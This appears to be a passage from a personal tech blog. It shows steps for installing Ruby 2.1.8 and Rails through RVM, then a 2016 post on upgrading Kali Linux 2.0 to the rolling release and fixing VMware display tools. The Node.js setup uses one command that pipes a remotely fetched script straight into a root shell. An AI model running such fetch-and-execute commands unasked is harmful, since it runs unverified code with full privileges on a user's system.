Step 3.  Setup the RVM Environment 
# source /etc/profile.d/rvm.sh
Step 4. Install ruby 
# rvm install 2.1.8

Step 5.  Configure the Default version of Ruby 
# rvm use 2.1.8 --default

Using /usr/local/rvm/gems/ruby-2.1.8

Step 6.  Check the current version of Ruby 

# ruby --version

ruby 2.1.8p440 (2015-12-16 revision 53160) [x86_64-linux]

Install Rails 
# gem install rails -V
Create a Test Application (Optional) to verify that Rails is working properly
NOTE: After running rails server --binding=<server ip address> the following error might pop up: "There was an error while trying to load the gem 'uglifier'". If you see this error you will need to install nodejs, since uglifier needs a JavaScript runtime. Run the following commands to install nodejs:

curl -sL https://rpm.nodesource.com/setup | bash -
yum install -y nodejs
npm install -g express-generator
npm -g install npm@latest

# cd ~

# rails new testapp
Then move into the application's directory:
# cd testapp
Create the sqlite3 database:
# rake db:create
Start the server, binding it to the server's address so it is reachable from your browser:
# rails server --binding=<server ip address>
Then browse to http://<server ip address>:3000

Sunday, February 14, 2016

Upgrading from Kali Linux 2.0(sana) to Kali Linux rolling edition

I've been putting a lot of things off lately and upgrading my Kali Linux has been one of them, but no more :). This is a quick step-by-step guide on how to upgrade to Kali Linux rolling edition.


Step 1. Before doing anything, run a quick apt-get update and apt-get upgrade to apply any outstanding updates to the Kali Linux 2.0 image.

Step 2. Once the updates have been applied, open /etc/apt/sources.list with your favorite editor (mine being vim) and replace the existing sana entries with the following line, so that the old and rolling repositories are not mixed.

deb http://http.kali.org/kali kali-rolling main non-free contrib

Step 3. After adding the above source to /etc/apt/sources.list, run the following commands, then just walk away and grab some coffee and a pop tart (yum).

apt-get update
apt-get dist-upgrade
reboot

Step 4. After completing the upgrade and rebooting into Kali Linux rolling edition, you may have to reinstall open-vm-tools-desktop to make sure the full screen option works properly with the rolling edition.

Note: After the upgrade I've noticed a couple of changes

1. The network interface name changed from eth0 to eno16777736; this is similar to the predictable interface naming in a default CentOS 7 installation.

2. After upgrading to Kali Linux rolling my display in full screen mode was still not right. After hours of searching and testing I found the solution that worked for me, by running the following commands:



# uninstall vmware tools  (note: I transitioned from Kali 2.0):
vmware-uninstall-tools.pl 

# uninstall open-vm-tools
apt-get remove open-vm-tools-desktop
apt-get autoremove
reboot

# install open-vm-tools
apt-get install open-vm-tools-desktop
reboot